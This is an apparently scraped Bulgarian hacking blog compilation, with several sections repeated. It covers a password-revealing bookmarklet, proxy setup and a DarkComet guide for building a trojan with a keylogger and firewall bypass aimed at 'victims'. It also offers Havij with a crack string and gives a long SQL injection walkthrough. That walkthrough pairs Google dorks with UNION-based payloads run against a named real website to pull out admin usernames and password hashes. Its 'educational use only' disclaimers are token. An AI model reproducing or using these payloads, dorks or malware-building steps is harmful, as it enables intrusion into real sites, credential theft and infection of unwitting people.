В днешната статия ще ви покажем как да разберете скритата парола която се крие зад звездите .За целта не използваме никакъв Software или допълнителни сайтове .
Влезте в някой сайт ,който използва парола за примера ще вземем www.facebook.com
Въведете някакво потребителско име и парола след което в URL бара на мястото на сайта напишете следния код:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Паролата на тази страница е :\n\n" + s); else alert("Няма използвана парола.");})();
И натиснете Enter
Ако не се получи проверете дали пред (function е въведено javascript:
Какво е Proxy и как се работи с него
Прокси сървър е някакъв вид буфер между вашия компютър и определената дестинация в интернет. Когато използвате прокси сървър, вашият компютър ще изпрати искане до прокси сървърa, прокси сървърa ще го изпрати до местоназначението (например уебсайт), дестинацията ще отговори на искането на проксито и накрая проксито връща данните към вашия компютър. Когато посетите сайт с прокси сървър, то изглежда така:
Причини за използване на прокси сървъри:
Прокси сървъра е в състояние да увеличи или намали скоростта на вашата връзка към Интернет, в зависимост от местоположението на проксито
Прокси сървъра (но само анонимните) може да скрие вашия IP адрес (сайта ,който посещавате ще извлече IP адреса на проксито а не вашият.
Прокси сървърите могат да помогнат, в случай че някои собственици на сайтове налагат ограничения за потребителите от някои страни
Работата е проста, просто следвайте тези инструкции за Internet Explorer
1. Отворете Internet Explorer
2. В лентата с менюта, изберете Tools, Internet Options
3. След това кликнете на Connection tab
4.Най-доло в Connection tab, ще видите LAN settings;
5.В LAN меню, изберете use a proxy server .В Address Добавете IP адреса на проксито което мислите да използвате, и добавете Port, След това кликнете на ОК настройките трябва да имат този вид:
В този пример използваме анонимен прокси сървар който се намира в Англия 64.66.192.61 и port 80 . Тук ще намерите списък с проксита които можете да използвате. Тези са безплатни за повече можете да проверите в гоогъл..
Настройки на прокси за Мозила
1. Отворете Mozilla Firefox
2.В Menu bar, изберете Tools, после Options…
3. След като се появи Options прозореца кликнете на Advanced меню
4. В Advanced менюто, ще намерите Settings, кликнете.
5.В Settings меню, изберете Manually proxy configuration, В HTTP Proxy добавете IP адреси на прокси сървъри и съотвено портове, Можете също така да изберете сайтове за които да не използвате прокси няма смисал да използвате прокси от америка за български сайтове след това изберете Ok
1. Отворете Internet Explorer
2. В лентата с менюта, изберете Tools, Internet Options
3. След това кликнете на Connection tab
4.Най-доло в Connection tab, ще видите LAN settings;
5.В LAN меню, изберете use a proxy server .В Address Добавете IP адреса на проксито което мислите да използвате, и добавете Port, След това кликнете на ОК настройките трябва да имат този вид:
В този пример използваме анонимен прокси сървар който се намира в Англия 64.66.192.61 и port 80 . Тук ще намерите списък с проксита които можете да използвате. Тези са безплатни за повече можете да проверите в гоогъл..
Настройки на прокси за Мозила
1. Отворете Mozilla Firefox
2.В Menu bar, изберете Tools, после Options…
3. След като се появи Options прозореца кликнете на Advanced меню
4. В Advanced менюто, ще намерите Settings, кликнете.
5.В Settings меню, изберете Manually proxy configuration, В HTTP Proxy добавете IP адреси на прокси сървъри и съотвено портове, Можете също така да изберете сайтове за които да не използвате прокси няма смисал да използвате прокси от америка за български сайтове след това изберете Ok
Могат ли други хора да прегледат Моите запазени пароли в Firefox?
Да приемем, че вие сте потребител на Mozilla Firefox и позволите на приятел, да използва вашия компютър без ваше наблюдение. Ако смятате, че вашите пароли са защитени, тогава вие грешите. Приятелят ви лесно може да види вашите пароли и потребителски имена . Проблемът е, че Firefox позволява на всеки да види всички вашите пароли за сигурност. За да видите паролите и потребителските имена, свързани със сигурността, трябва само да отидете на Инструменти, Опции, в раздела Защита щракнете върху запазените пароли. След това, всички ваши пароли са видими за всеки, който има достъп до вашия компютър.Той изглежда така:
Но как да си защитим паролите? Firefox има възможност да зададете главна парола. Чрез създаването на главна парола, потребителят ще трябва да я въведе за да отключи достъпа до съхранените пароли.Отидете в Tools, после Options, в раздела Защита щракнете върху използване на главна парола. Въведете парола и вашата сигурност ще бъде малко подобрена.
Как да сваляме клипове от Youtube
Ще намерите много начини за сваляне на клипове от Youtube , но повечето изискват програми или сайтове с имена които трудно можете да запомните ето един метод с които сваляте клипове от Youtube с точно 5 клипа на мишката.
След като изгледате клипа които примерно е :
Въведете след www.kick и така линка ще бъде
Троянски Кон ( Trojan ) - Или така наречените RAT-ове
Линк за най-добрия троянски кон правен някога - Тук
Често виждате как
антивирусната ви програма намира Троянски кон или чувате хора покрай вас които
говорят за този така често използван вирус .Какво всъщност представлява той и
колко трудно е да се използва.След като прочетете статията ще разберете колко лесно
е да се направи такъв вирус да се разпространи и да се използва , а също така и
как да се защитите от такъв вид злонамерен код .
Троянския кон за
разлика от другите видове вируси стой тихо в системата скрит в някой файл в
повечето случаи се намира в папката на Windows . Целта му е да събере нужната информация която хакера иска да получи от
вас.А това са емайли , регистрации , лицензи за програми , кредитни карти и
други . Съкращението RAT (
плъх ) идва от remote administration tools ( програма за отдалечен достъп ) . Има два вида
такива програми . Едните са легални и стоят на компютъра със знанието на човека
,който го използва а другите ( вирусите
) са скрити и са там без ясната представа на жертвата.Сигурно си мислите е да
но аз имам антивирусна и съм защитен от вируси , но с всеки изминал ден излизат
нови и нови програми за криптиране на тези вируси.Намират се под наименованието
Crypters . Когато се създаде
нов Crypter докато компаниите които се занимават с антивирусен software
успеят да пуснат update той е FUD. Full Undetectable .
Най-използваните
троянски коне са DarkComet и CyberGate
лесни за настройка и работа с тях.
Екстрите които
има един троянски кон са много скрито да се рови в HardDisk-а
, наблюдава вашата Web Camera , прави записи ако имате включен микрофон
и много други които сами можете да разгледате . Стига толкова суха
теория време е да преминем към същинската част а именно как да направим нашия
пръв вирус ( Троянски кон )
Ще използваме Dark
Comet които можете да свалите от официалния
им сайт.Което е за препоръчване тъй като има доста копия които вече са заразени
със вирус.
Няма да се впускам
в обяснения как да го свалите предполага се ,че вече знаете как.След като
разархивирате файла и отворите DarkCometRAT.exe виждате ,че има 4 прозореца и едно главно меню сравнително опростена програма. Първо избирате от менюто Listen
to New Port по default e 1604
и е препоръчван за използване .
След това
преминаваме към същинската част а тя е от падащото меню Server Module.
Security Password : За препоръчване е да има сложена парола ( но не е задължителна опция ).
Server ID – Може
да е произволно по-ваш избор за да може после в списъка да разпознавате
жертвите
Ако човека ,който
искате да заразите ( за учебна цел разбира се ) няма антивирусна и немислите да
използвате Crypter ( за който
говорихме по-рано в статията ) е желателно опцията Activate Firewall
Bypass
В секцията Network
Settings се въвеждат настройките за
връзка на вашия вирус със вас. На IP/DNS въведете вашето IP ако не
сте сигурни как е можете да проверите в www.google.com
като напишете What is my IP .
Третата секция е
къде ще отиде вируса след като го отворят препоръчва се някъде скрит в папката
на Windows .Както вече
видяхте вируса има вграден Key Logger , който вие решавате дали да използвате или не . Можете да смените по избор
иконата на вашия файл. А също така и да го обедините със друг от File
Binder и последното което трябва да
направите е да кликнете върху Build Server и готово
вашият вирус вече е готов.
Очаквайте статия
как да криптираме вируса ,няколко интересни метода за разпространение на
вируса, и как винаги да имаме достъп до заразените компютри от която и да е
точка
Havij - чудесна програма за MySQLi
В предишната
статия ви показахме как да проверите даден сайт дали подлежи на MySQL инжекция сега ще ви споделим и една
програма която доста улеснява цялата тази процедура като тества множество
грешки които могат да бъдат критични за вашия сайт.
Програмата не работи със URL от вида http://www.example.com , а такива които завършват на дадена стойност както е дадено в примера.
След успешно сканиране със Havij вие имате достъп до базата данни на сайт-а
, от която могат да бъдат взети съответно
username и пароли на
регистрираните хора в сайта както и
паролата на администратора.Която ще даде на хакерите достъп до вашия админ
панел.
Програмата има
още вграден MD5 ( декриптър )
с , който могат да бъдат разбити почти
всички hash пароли от базата
данни . Обновява се редовно и е една от
най-използваните от програми правени за тази цел.Има още и търсачка за админ
панела . Линукс конзола за достъп до вашия компютър и много други екстри.
Очаквайте скоро и
клип с ,който ще покажем как точно се
работи с програмата.
Моля използвайте
статията само за учебна цел.
Програмата я има в два варянта безплатен и платен
Безплатния можете да намерите във официалния им сайт
Платения можете да свалите от : Тук
При регистрацията иска да въведете .lic файл които се намира в папката ,а на лиценза въведете
този текст Cracked@By.Exidous
Програмата я има в два варянта безплатен и платен
Безплатния можете да намерите във официалния им сайт
Платения можете да свалите от : Тук
При регистрацията иска да въведете .lic файл които се намира в папката ,а на лиценза въведете
този текст Cracked@By.Exidous
Acunetix - една от най-добрите програми правени някога
Програмата е създадена оригинално да пази от хакери вашия сайт ,но също така е и един от най-полезните инструменти за всеки хакер .
Сканира вашия сайт дълбоко и показва възможните грешки които могат да се използват SQL , XSS , HTML Injection , Java Injection , Пароли и слабости в базата данни , също така и проверява за грешки в FTP сървъра ако има такъв .
Ако ви е интересно дали конкретен сайт може да бъде хакнат или просто искате да защитите своя сайт просто свалете програмата от официалния сайт или се свържете с мен за най-новата версия която е регистрирана.Грешките след сканирането ще забележите че са групирани по-риска съответно с определени цветове
Ето и два снимки от програмата за да добиете представа какво представлява.
Този е след сканиране на даден сайт.
Програмата можете да намерите на този линк : Тук
Сканира вашия сайт дълбоко и показва възможните грешки които могат да се използват SQL , XSS , HTML Injection , Java Injection , Пароли и слабости в базата данни , също така и проверява за грешки в FTP сървъра ако има такъв .
Ако ви е интересно дали конкретен сайт може да бъде хакнат или просто искате да защитите своя сайт просто свалете програмата от официалния сайт или се свържете с мен за най-новата версия която е регистрирана.Грешките след сканирането ще забележите че са групирани по-риска съответно с определени цветове
Ето и два снимки от програмата за да добиете представа какво представлява.
Този е след сканиране на даден сайт.
Програмата можете да намерите на този линк : Тук
SQLi - един от най-използваните методи за хакване на сайт.
Днес ще ви покажa как се използва един от най-използваните начини за хакване на сайт.
Моля използвайте урока само за учебни цели.
Първото нещо с което се започва е намирането на подходящи сайтове които подлежат на SQLi за тази цел използваме www.google.com и търсим съответните грешки.
Код:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()
"id=" & intext:"Warning: require()
За да проверите ръчно дали сайта подлежи на този вид атака просто след стойността на id=1 добавете ‘ example.com/index.php?id=1’
Код:
http://www.cocobod.gh/news_details.php?id=30
Код:
http://www.cocobod.gh/news_details.php?id=30'
Ако при теста видите грешка от този вид сайта подлежи на този вид атака.
Преминаваме към следваща стъпка.
Как да намерим броя на колоните:
След като сте намерили сайта в който има наличие на тази грешка е нужно да намерим броя на колоните, за да направите това просто добавете "order by X--" в края на страницата,
X е номер от едно до безкрайност.
Започваме да променяме X от 1 ,
добавяме order by 1—в края , после order by 2--,и така нататък. Винаги увеличавайте докато имате грешка като тази:
За нашата цел пробвахме:
Код:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
Това значи ,че 8ма колона не съществува и са само 7!
Как да намерим достъпните Колони:
Сега разбрахме ,че колоните са 7 но трябва да намерим тези който са достъпни, За да направим това използваме следната заявка"UNION SELECT номера на колоните като в случея:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
Ще видим нещо такова:
Това значи че ние можем да вземем информация от 6-та 2-ра и 3-та колона
Как да вземем MySQL версията която ще ни е нужна после:
За да разберете MySQL DB версия, сменете номера на една от тези колони със "@@version"
пример:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
Можем да продължим със сайта.
Как да намерим името на базата данни:
Сега ще инжектираме сайта за да разберем името на база данните,
затова сменете колоната със "group_concat(schema_name)", и добавете "from information_schema.schemata--" след последната колона Пример:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Сега за да я използваме сменете "group_concat(schema_name)" с "concat(database())" пример:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Честито вече имате използваната база данни!
Как да намерим имената на таблиците:
Сега трябва да намерим имената на таблиците за тази цел сменете използваното column number с "group_concat(table_name)" и добавете "from information_schema.tables where table_schema=database()--" в края.
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Как да видим имената на колоните:
За тази цел използваме следната заявка:
group_concat(column_name)
from information_schema.columns where table_schema=database()--
пример:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
Как да вземем информация от тези колони:
Сега сме към края на урока въведете следния код за да видите информацията от колоните
Код:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Нашият експлойт ще има следния вид:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
На екрана виждате username на админа и паролата , но за жалост тя е криптирана и работата малко се усложнява. Почти винаги hash ( криптираната парола е MD5 ) има много сайтове за декриптиране на hash-ове
Честито успяхме успешно да инжектираме сайта и се добрахме до информацията с която можем да се логнем като администратори.Благодаря за прочитането на страницата.
Първото нещо с което се започва е намирането на подходящи сайтове които подлежат на SQLi за тази цел използваме www.google.com и търсим съответните грешки.
Код:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()
"id=" & intext:"Warning: require()
За да проверите ръчно дали сайта подлежи на този вид атака просто след стойността на id=1 добавете ‘ example.com/index.php?id=1’
Код:
http://www.cocobod.gh/news_details.php?id=30
Код:
http://www.cocobod.gh/news_details.php?id=30'
Ако при теста видите грешка от този вид сайта подлежи на този вид атака.
Преминаваме към следваща стъпка.
Как да намерим броя на колоните:
След като сте намерили сайта в който има наличие на тази грешка е нужно да намерим броя на колоните, за да направите това просто добавете "order by X--" в края на страницата,
X е номер от едно до безкрайност.
Започваме да променяме X от 1 ,
добавяме order by 1—в края , после order by 2--,и така нататък. Винаги увеличавайте докато имате грешка като тази:
За нашата цел пробвахме:
Код:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
Това значи ,че 8ма колона не съществува и са само 7!
Как да намерим достъпните Колони:
Сега разбрахме ,че колоните са 7 но трябва да намерим тези който са достъпни, За да направим това използваме следната заявка"UNION SELECT номера на колоните като в случея:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
Ще видим нещо такова:
Това значи че ние можем да вземем информация от 6-та 2-ра и 3-та колона
Как да вземем MySQL версията която ще ни е нужна после:
За да разберете MySQL DB версия, сменете номера на една от тези колони със "@@version"
пример:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
Можем да продължим със сайта.
Как да намерим името на базата данни:
Сега ще инжектираме сайта за да разберем името на база данните,
затова сменете колоната със "group_concat(schema_name)", и добавете "from information_schema.schemata--" след последната колона Пример:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Сега за да я използваме сменете "group_concat(schema_name)" с "concat(database())" пример:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Честито вече имате използваната база данни!
Как да намерим имената на таблиците:
Сега трябва да намерим имената на таблиците за тази цел сменете използваното column number с "group_concat(table_name)" и добавете "from information_schema.tables where table_schema=database()--" в края.
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Как да видим имената на колоните:
За тази цел използваме следната заявка:
group_concat(column_name)
from information_schema.columns where table_schema=database()--
пример:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
Как да вземем информация от тези колони:
Сега сме към края на урока въведете следния код за да видите информацията от колоните
Код:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Нашият експлойт ще има следния вид:
Код:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
